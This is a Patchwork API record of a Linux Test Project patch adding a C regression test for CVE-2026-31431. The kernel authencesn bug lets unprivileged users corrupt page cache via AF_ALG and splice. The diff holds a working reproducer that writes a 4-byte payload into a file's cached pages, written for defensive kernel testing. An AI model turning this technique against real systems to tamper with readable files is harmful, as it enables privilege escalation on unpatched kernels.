GET

Patch Detail

get:
Show a patch.

patch:
Update a patch.

put:
Update a patch.

GET /api/1.1/patches/2231064/?format=api
HTTP 200 OK
Allow: GET, PUT, PATCH, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "id": 2231064,
    "url": "http://patchwork.ozlabs.org/api/1.1/patches/2231064/?format=api",
    "web_url": "http://patchwork.ozlabs.org/project/ltp/patch/20260430-cve-2026-31431-v1-1-7fdc16c25785@suse.com/",
    "project": {
        "id": 59,
        "url": "http://patchwork.ozlabs.org/api/1.1/projects/59/?format=api",
        "name": "Linux Test Project development",
        "link_name": "ltp",
        "list_id": "ltp.lists.linux.it",
        "list_email": "ltp@lists.linux.it",
        "web_url": "",
        "scm_url": "",
        "webscm_url": ""
    },
    "msgid": "<20260430-cve-2026-31431-v1-1-7fdc16c25785@suse.com>",
    "date": "2026-04-30T10:17:14",
    "name": "cve-2026-31431: Add page cache corruption reproducer",
    "commit_ref": null,
    "pull_url": null,
    "state": "needs-review-ack",
    "archived": false,
    "hash": "ba1d3a388b62819672a8acd9a7f660446bd8476a",
    "submitter": {
        "id": 83220,
        "url": "http://patchwork.ozlabs.org/api/1.1/people/83220/?format=api",
        "name": "Andrea Cervesato",
        "email": "andrea.cervesato@suse.de"
    },
    "delegate": null,
    "mbox": "http://patchwork.ozlabs.org/project/ltp/patch/20260430-cve-2026-31431-v1-1-7fdc16c25785@suse.com/mbox/",
    "series": [
        {
            "id": 502266,
            "url": "http://patchwork.ozlabs.org/api/1.1/series/502266/?format=api",
            "web_url": "http://patchwork.ozlabs.org/project/ltp/list/?series=502266",
            "date": "2026-04-30T10:17:14",
            "name": "cve-2026-31431: Add page cache corruption reproducer",
            "version": 1,
            "mbox": "http://patchwork.ozlabs.org/series/502266/mbox/"
        }
    ],
    "comments": "http://patchwork.ozlabs.org/api/patches/2231064/comments/",
    "check": "fail",
    "checks": "http://patchwork.ozlabs.org/api/patches/2231064/checks/",
    "tags": {},
    "headers": {
        "Return-Path": "<ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it>",
        "X-Original-To": [
            "incoming@patchwork.ozlabs.org",
            "ltp@lists.linux.it"
        ],
        "Delivered-To": [
            "patchwork-incoming@legolas.ozlabs.org",
            "ltp@picard.linux.it"
        ],
        "Authentication-Results": [
            "legolas.ozlabs.org;\n\tdkim=fail reason=\"signature verification failed\" (1024-bit key;\n unprotected) header.d=suse.de header.i=@suse.de header.a=rsa-sha256\n header.s=susede2_rsa header.b=XFfjuZ2w;\n\tdkim=fail reason=\"signature verification failed\" header.d=suse.de\n header.i=@suse.de header.a=ed25519-sha256 header.s=susede2_ed25519\n header.b=6NraV8Sb;\n\tdkim=fail reason=\"signature verification failed\" (1024-bit key)\n header.d=suse.de header.i=@suse.de header.a=rsa-sha256 header.s=susede2_rsa\n header.b=XFfjuZ2w;\n\tdkim=neutral header.d=suse.de header.i=@suse.de header.a=ed25519-sha256\n header.s=susede2_ed25519 header.b=6NraV8Sb;\n\tdkim-atps=neutral",
            "legolas.ozlabs.org;\n spf=pass (sender SPF authorized) smtp.mailfrom=lists.linux.it\n (client-ip=2001:1418:10:5::2; helo=picard.linux.it;\n envelope-from=ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it;\n receiver=patchwork.ozlabs.org)",
            "smtp-out1.suse.de;\n\tnone"
        ],
        "Received": [
            "from picard.linux.it (picard.linux.it [IPv6:2001:1418:10:5::2])\n\t(using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n\t key-exchange x25519 server-signature ECDSA (secp384r1) server-digest SHA384)\n\t(No client certificate requested)\n\tby legolas.ozlabs.org (Postfix) with ESMTPS id 4g5qqF4y7hz1yHZ\n\tfor <incoming@patchwork.ozlabs.org>; Thu, 30 Apr 2026 20:17:29 +1000 (AEST)",
            "from picard.linux.it (localhost [IPv6:::1])\n\tby picard.linux.it (Postfix) with ESMTP id AE6EB3E68C7\n\tfor <incoming@patchwork.ozlabs.org>; Thu, 30 Apr 2026 12:17:21 +0200 (CEST)",
            "from in-2.smtp.seeweb.it (in-2.smtp.seeweb.it\n [IPv6:2001:4b78:1:20::2])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature ECDSA (secp384r1))\n (No client certificate requested)\n by picard.linux.it (Postfix) with ESMTPS id CD92E3E1A52\n for <ltp@lists.linux.it>; Thu, 30 Apr 2026 12:17:17 +0200 (CEST)",
            "from smtp-out1.suse.de (smtp-out1.suse.de [195.135.223.130])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest\n SHA256)\n (No client certificate requested)\n by in-2.smtp.seeweb.it (Postfix) with ESMTPS id 4E11A60026D\n for <ltp@lists.linux.it>; Thu, 30 Apr 2026 12:17:17 +0200 (CEST)",
            "from imap1.dmz-prg2.suse.org (unknown [10.150.64.97])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature RSA-PSS (4096 bits) server-digest\n SHA256)\n (No client certificate requested)\n by smtp-out1.suse.de (Postfix) with ESMTPS id AF8426A803;\n Thu, 30 Apr 2026 10:17:16 +0000 (UTC)",
            "from imap1.dmz-prg2.suse.org (localhost [127.0.0.1])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature RSA-PSS (4096 bits) server-digest\n SHA256)\n (No client certificate requested)\n by imap1.dmz-prg2.suse.org (Postfix) with ESMTPS id 90146593B0;\n Thu, 30 Apr 2026 10:17:16 +0000 (UTC)",
            "from dovecot-director2.suse.de ([2a07:de40:b281:106:10:150:64:167])\n by imap1.dmz-prg2.suse.org with ESMTPSA id R/noICws82kScwAAD6G6ig\n (envelope-from <andrea.cervesato@suse.de>); Thu, 30 Apr 2026 10:17:16 +0000"
        ],
        "DKIM-Signature": [
            "v=1; a=rsa-sha256; c=relaxed/relaxed; d=suse.de;\n s=susede2_rsa;\n t=1777544236;\n h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc:\n mime-version:mime-version:content-type:content-type:\n content-transfer-encoding:content-transfer-encoding;\n bh=DumUA1pg1gFRBHsFGzJAuBPDzBGDXyd6FycHMGI+CnA=;\n b=XFfjuZ2w5zy+tFyTsejlrUrc3qk2SQ+Kwk9m8VorkBusiOdcu1+7xbBgEkU+fDYi0gYVyS\n b+HzD0r7r7TIzGd4oUL8Kt2i0cd9at2a8rUm4T2HPGvnmkhO7DxyacTvFP0gz5mq7zo7fZ\n hb09y55pOHIkxe//spUe/dkx2buoyGk=",
            "v=1; a=ed25519-sha256; c=relaxed/relaxed; d=suse.de;\n s=susede2_ed25519; t=1777544236;\n h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc:\n mime-version:mime-version:content-type:content-type:\n content-transfer-encoding:content-transfer-encoding;\n bh=DumUA1pg1gFRBHsFGzJAuBPDzBGDXyd6FycHMGI+CnA=;\n b=6NraV8SbObpTkPUmPDXxt3D1dWfOeMy03LHG1WYEMhtdzuFmZO6GHrFrtJgWZOEanVosvx\n JIEDnSt+CCTIJnAA==",
            "v=1; a=rsa-sha256; c=relaxed/relaxed; d=suse.de;\n s=susede2_rsa;\n t=1777544236;\n h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc:\n mime-version:mime-version:content-type:content-type:\n content-transfer-encoding:content-transfer-encoding;\n bh=DumUA1pg1gFRBHsFGzJAuBPDzBGDXyd6FycHMGI+CnA=;\n b=XFfjuZ2w5zy+tFyTsejlrUrc3qk2SQ+Kwk9m8VorkBusiOdcu1+7xbBgEkU+fDYi0gYVyS\n b+HzD0r7r7TIzGd4oUL8Kt2i0cd9at2a8rUm4T2HPGvnmkhO7DxyacTvFP0gz5mq7zo7fZ\n hb09y55pOHIkxe//spUe/dkx2buoyGk=",
            "v=1; a=ed25519-sha256; c=relaxed/relaxed; d=suse.de;\n s=susede2_ed25519; t=1777544236;\n h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc:\n mime-version:mime-version:content-type:content-type:\n content-transfer-encoding:content-transfer-encoding;\n bh=DumUA1pg1gFRBHsFGzJAuBPDzBGDXyd6FycHMGI+CnA=;\n b=6NraV8SbObpTkPUmPDXxt3D1dWfOeMy03LHG1WYEMhtdzuFmZO6GHrFrtJgWZOEanVosvx\n JIEDnSt+CCTIJnAA=="
        ],
        "From": "Andrea Cervesato <andrea.cervesato@suse.de>",
        "Date": "Thu, 30 Apr 2026 12:17:14 +0200",
        "MIME-Version": "1.0",
        "Message-Id": "<20260430-cve-2026-31431-v1-1-7fdc16c25785@suse.com>",
        "X-B4-Tracking": "v=1; b=H4sIACks82kC/6tWKk4tykwtVrJSqFYqSi3LLM7MzwNyDHUUlJIzE\n vPSU3UzU4B8JSMDIzMDE2MD3eSyVF0QR9fY0MTYUDc1JdHEyNI8xdQsKVkJqKmgKDUtswJsYHR\n sbS0ADCTSfWAAAAA=",
        "X-Change-ID": "20260430-cve-2026-31431-eda4297d56bc",
        "To": "Linux Test Project <ltp@lists.linux.it>",
        "X-Mailer": "b4 0.14.2",
        "X-Developer-Signature": "v=1; a=ed25519-sha256; t=1777544236; l=6897;\n i=andrea.cervesato@suse.com; s=20251210; h=from:subject:message-id;\n bh=S/GBJgJZ9Pq34TF9mz2UvgScf8nbYIq4dh8uuMTIRhw=;\n b=7qEhFK8TrQHNuxG+7jMkMSF67WCAmvb9MstKAg6s70Y8VrXtZNIqIv8F4tjwm05BG2DNBtOGK\n 1/jF6xiWahzC65IKvzTPzrynfIZ8UL38HFSbuYiYf72R8/e23vrGEs4",
        "X-Developer-Key": "i=andrea.cervesato@suse.com; a=ed25519;\n pk=zKY+6GCauOiuHNZ//d8PQ/UL4jFCTKbXrzXAOQSLevI=",
        "X-Spamd-Result": "default: False [-4.30 / 50.00]; BAYES_HAM(-3.00)[100.00%];\n NEURAL_HAM_LONG(-1.00)[-1.000];\n NEURAL_HAM_SHORT(-0.20)[-1.000]; MIME_GOOD(-0.10)[text/plain];\n RCVD_TLS_ALL(0.00)[]; RCPT_COUNT_TWO(0.00)[2];\n FUZZY_RATELIMITED(0.00)[rspamd.com];\n RCVD_VIA_SMTP_AUTH(0.00)[]; ARC_NA(0.00)[];\n DKIM_SIGNED(0.00)[suse.de:s=susede2_rsa,suse.de:s=susede2_ed25519];\n URIBL_BLOCKED(0.00)[suse.com:mid,suse.com:email,imap1.dmz-prg2.suse.org:helo];\n TO_DN_ALL(0.00)[]; FROM_HAS_DN(0.00)[]; MIME_TRACE(0.00)[0:+];\n FROM_EQ_ENVFROM(0.00)[]; TO_MATCH_ENVRCPT_ALL(0.00)[];\n RCVD_COUNT_TWO(0.00)[2];\n DBL_BLOCKED_OPENRESOLVER(0.00)[imap1.dmz-prg2.suse.org:helo, suse.com:mid,\n suse.com:email]",
        "X-Spam-Score": "-4.30",
        "X-Spam-Level": "",
        "X-Spam-Status": "No, score=0.1 required=7.0 tests=DKIM_SIGNED,DKIM_VALID,\n DKIM_VALID_AU,DKIM_VALID_EF,DMARC_PASS,SPF_HELO_NONE,SPF_PASS\n shortcircuit=no autolearn=disabled version=4.0.1",
        "X-Spam-Checker-Version": "SpamAssassin 4.0.1 (2024-03-25) on in-2.smtp.seeweb.it",
        "X-Virus-Scanned": "clamav-milter 1.0.9 at in-2.smtp.seeweb.it",
        "X-Virus-Status": "Clean",
        "Subject": "[LTP] [PATCH] cve-2026-31431: Add page cache corruption reproducer",
        "X-BeenThere": "ltp@lists.linux.it",
        "X-Mailman-Version": "2.1.29",
        "Precedence": "list",
        "List-Id": "Linux Test Project <ltp.lists.linux.it>",
        "List-Unsubscribe": "<https://lists.linux.it/options/ltp>,\n <mailto:ltp-request@lists.linux.it?subject=unsubscribe>",
        "List-Archive": "<http://lists.linux.it/pipermail/ltp/>",
        "List-Post": "<mailto:ltp@lists.linux.it>",
        "List-Help": "<mailto:ltp-request@lists.linux.it?subject=help>",
        "List-Subscribe": "<https://lists.linux.it/listinfo/ltp>,\n <mailto:ltp-request@lists.linux.it?subject=subscribe>",
        "Content-Type": "text/plain; charset=\"us-ascii\"",
        "Content-Transfer-Encoding": "7bit",
        "Errors-To": "ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it",
        "Sender": "\"ltp\" <ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it>"
    },
    "content": "From: Andrea Cervesato <andrea.cervesato@suse.com>\n\nA logic bug in authencesn allows an unprivileged user to corrupt\n4 bytes of page cache via AF_ALG + splice. The test writes known\ndata to a file, attempts corruption through the AEAD scratch-write\npath, and verifies whether the file content was modified.\n\nSigned-off-by: Andrea Cervesato <andrea.cervesato@suse.com>\n---\n runtest/cve                    |   1 +\n testcases/cve/.gitignore       |   1 +\n testcases/cve/cve-2026-31431.c | 172 +++++++++++++++++++++++++++++++++++++++++\n 3 files changed, 174 insertions(+)\n\n\n---\nbase-commit: 69b8169310425b8c5abd01d3fdb46f6d939e8a66\nchange-id: 20260430-cve-2026-31431-eda4297d56bc\n\nBest regards,",
    "diff": "diff --git a/runtest/cve b/runtest/cve\nindex c3ecd74dd9f837924b810b7b431ebb911d809966..499cbb3bc4170453560c329133e2c52b5a3b8c5c 100644\n--- a/runtest/cve\n+++ b/runtest/cve\n@@ -93,3 +93,4 @@ cve-2022-0185 fsconfig03\n cve-2022-4378 cve-2022-4378\n cve-2025-38236 cve-2025-38236\n cve-2025-21756 cve-2025-21756\n+cve-2026-31431 cve-2026-31431\ndiff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore\nindex dc1dad5b0d0d02a3ab57e72516c33ee7949c8431..f8e2b7a7d0a6c0c32f8908ae9974ead6a57f358b 100644\n--- a/testcases/cve/.gitignore\n+++ b/testcases/cve/.gitignore\n@@ -15,3 +15,4 @@ icmp_rate_limit01\n tcindex01\n cve-2025-38236\n cve-2025-21756\n+cve-2026-31431\ndiff --git a/testcases/cve/cve-2026-31431.c b/testcases/cve/cve-2026-31431.c\nnew file mode 100644\nindex 0000000000000000000000000000000000000000..b762096c1ecb940267ab2a337130939763f75452\n--- /dev/null\n+++ b/testcases/cve/cve-2026-31431.c\n@@ -0,0 +1,172 @@\n+// SPDX-License-Identifier: GPL-2.0-or-later\n+/*\n+ * Copyright (C) 2026 SUSE LLC Andrea Cervesato <andrea.cervesato@suse.com>\n+ */\n+\n+/*\\\n+ * Test for CVE-2026-31431 (\"Copy Fail\") fixed in kernel v7.0:\n+ * a664bf3d603d (\"crypto: algif_aead - Separate src from dst\")\n+ *\n+ * A logic bug in authencesn, the kernel's AEAD wrapper for IPsec Extended\n+ * Sequence Numbers, allows an unprivileged user to write 4 controlled bytes\n+ * into the page cache of any readable file. During AEAD decryption,\n+ * authencesn uses the destination scatterlist as scratch space for ESN byte\n+ * rearrangement. When data is spliced from a file into an AF_ALG socket, the\n+ * 2017 in-place optimization (72548b093ee3) places page cache pages into the\n+ * writable destination scatterlist. authencesn's scratch write then corrupts\n+ * those pages.\n+ *\n+ * The test creates a file with known data, attempts page cache corruption via\n+ * the AF_ALG + splice technique, and verifies whether the file content was\n+ * modified.\n+ *\n+ * Reproducer based on:\n+ * https://github.com/theori-io/copy-fail-CVE-2026-31431\n+ */\n+\n+#include \"tst_test.h\"\n+#include \"tst_af_alg.h\"\n+#include \"lapi/socket.h\"\n+#include \"lapi/splice.h\"\n+\n+#define TESTFILE \"copy_fail\"\n+#define OVERWRITE_SIZE 4\n+#define AEAD_AUTHSIZE 4\n+#define AEAD_ASSOCLEN 8\n+#define AES_IV_SIZE 16\n+#define SPI_SIZE 4\n+\n+static const uint8_t original[OVERWRITE_SIZE] = { 'X', 'X', 'X', 'X' };\n+static const uint8_t payload[OVERWRITE_SIZE] = { 'P', 'W', 'N', 'D' };\n+\n+/*\n+ * authenc key format: struct rtattr header (8 bytes) +\n+ * HMAC-SHA256 key (16 bytes) + AES-128 key (16 bytes)\n+ */\n+static const uint8_t authenc_key[] = {\n+\t0x08, 0x00, 0x01, 0x00,\n+\t0x00, 0x00, 0x00, 0x10,\n+\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n+\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n+\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n+\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n+};\n+\n+static void try_corrupt(int fd)\n+{\n+\tint algfd, reqfd, pipefd[2];\n+\tloff_t off_in = 0;\n+\tuint8_t aad[AEAD_ASSOCLEN];\n+\tuint8_t iv[AES_IV_SIZE] = { 0 };\n+\tstruct af_alg_iv *alg_iv;\n+\tstruct cmsghdr *cmsg;\n+\tchar recvbuf[AEAD_ASSOCLEN];\n+\n+\t/* AAD[0..3] = SPI (don't care), AAD[4..7] = ESN scratch-write zone */\n+\tmemset(aad, 'A', SPI_SIZE);\n+\tmemcpy(aad + SPI_SIZE, payload, OVERWRITE_SIZE);\n+\n+\talgfd = tst_alg_setup(\"aead\", \"authencesn(hmac(sha256),cbc(aes))\",\n+\t\t\t      authenc_key, sizeof(authenc_key));\n+\tSAFE_SETSOCKOPT(algfd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL,\n+\t\t\tAEAD_AUTHSIZE);\n+\n+\treqfd = tst_alg_accept(algfd);\n+\n+\tstruct iovec iov = {\n+\t\t.iov_base = aad,\n+\t\t.iov_len = sizeof(aad),\n+\t};\n+\n+\tuint8_t cbuf[CMSG_SPACE(sizeof(uint32_t)) +\n+\t\t     CMSG_SPACE(sizeof(struct af_alg_iv) + AES_IV_SIZE) +\n+\t\t     CMSG_SPACE(sizeof(uint32_t))];\n+\n+\tmemset(cbuf, 0, sizeof(cbuf));\n+\n+\tstruct msghdr msg = {\n+\t\t.msg_iov = &iov,\n+\t\t.msg_iovlen = 1,\n+\t\t.msg_control = cbuf,\n+\t\t.msg_controllen = sizeof(cbuf),\n+\t};\n+\n+\tcmsg = CMSG_FIRSTHDR(&msg);\n+\tcmsg->cmsg_level = SOL_ALG;\n+\tcmsg->cmsg_type = ALG_SET_OP;\n+\tcmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t));\n+\t*(uint32_t *)CMSG_DATA(cmsg) = ALG_OP_DECRYPT;\n+\n+\tcmsg = CMSG_NXTHDR(&msg, cmsg);\n+\tcmsg->cmsg_level = SOL_ALG;\n+\tcmsg->cmsg_type = ALG_SET_IV;\n+\tcmsg->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + AES_IV_SIZE);\n+\talg_iv = (struct af_alg_iv *)CMSG_DATA(cmsg);\n+\talg_iv->ivlen = AES_IV_SIZE;\n+\tmemcpy(alg_iv->iv, iv, AES_IV_SIZE);\n+\n+\tcmsg = CMSG_NXTHDR(&msg, cmsg);\n+\tcmsg->cmsg_level = SOL_ALG;\n+\tcmsg->cmsg_type = ALG_SET_AEAD_ASSOCLEN;\n+\tcmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t));\n+\t*(uint32_t *)CMSG_DATA(cmsg) = AEAD_ASSOCLEN;\n+\n+\tSAFE_SENDMSG(sizeof(aad), reqfd, &msg, MSG_MORE);\n+\n+\tSAFE_PIPE(pipefd);\n+\n+\tTEST(splice(fd, &off_in, pipefd[1], NULL, OVERWRITE_SIZE, 0));\n+\tif (TST_RET < 0)\n+\t\ttst_brk(TBROK | TTERRNO, \"splice(file -> pipe)\");\n+\n+\tTEST(splice(pipefd[0], NULL, reqfd, NULL, OVERWRITE_SIZE, 0));\n+\tif (TST_RET < 0)\n+\t\ttst_brk(TBROK | TTERRNO, \"splice(pipe -> AF_ALG)\");\n+\n+\t/* Expected to fail (invalid ciphertext); triggers the scratch write */\n+\tTST_EXP_FAIL_SILENT(recv(reqfd, recvbuf, sizeof(recvbuf), 0), EBADMSG);\n+\n+\tSAFE_CLOSE(pipefd[0]);\n+\tSAFE_CLOSE(pipefd[1]);\n+\tSAFE_CLOSE(reqfd);\n+\tSAFE_CLOSE(algfd);\n+}\n+\n+static void run(void)\n+{\n+\tint file_fd;\n+\tuint8_t readback[OVERWRITE_SIZE];\n+\n+\tfile_fd = SAFE_OPEN(TESTFILE, O_RDONLY);\n+\ttry_corrupt(file_fd);\n+\tSAFE_CLOSE(file_fd);\n+\n+\tfile_fd = SAFE_OPEN(TESTFILE, O_RDONLY);\n+\tSAFE_READ(1, file_fd, readback, sizeof(readback));\n+\tSAFE_CLOSE(file_fd);\n+\n+\tif (memcmp(readback, original, OVERWRITE_SIZE) != 0)\n+\t\ttst_res(TFAIL, \"Page cache was corrupted via AF_ALG splice\");\n+\telse\n+\t\ttst_res(TPASS, \"Page cache was not corrupted\");\n+}\n+\n+static void setup(void)\n+{\n+\tint fd;\n+\n+\tfd = SAFE_OPEN(TESTFILE, O_WRONLY | O_CREAT | O_TRUNC, 0644);\n+\tSAFE_WRITE(SAFE_WRITE_ALL, fd, original, OVERWRITE_SIZE);\n+\tSAFE_CLOSE(fd);\n+}\n+\n+static struct tst_test test = {\n+\t.test_all = run,\n+\t.setup = setup,\n+\t.needs_tmpdir = 1,\n+\t.tags = (const struct tst_tag[]) {\n+\t\t{\"linux-git\", \"a664bf3d603d\"},\n+\t\t{\"CVE\", \"2026-31431\"},\n+\t\t{}\n+\t},\n+};\n",
    "prefixes": []
}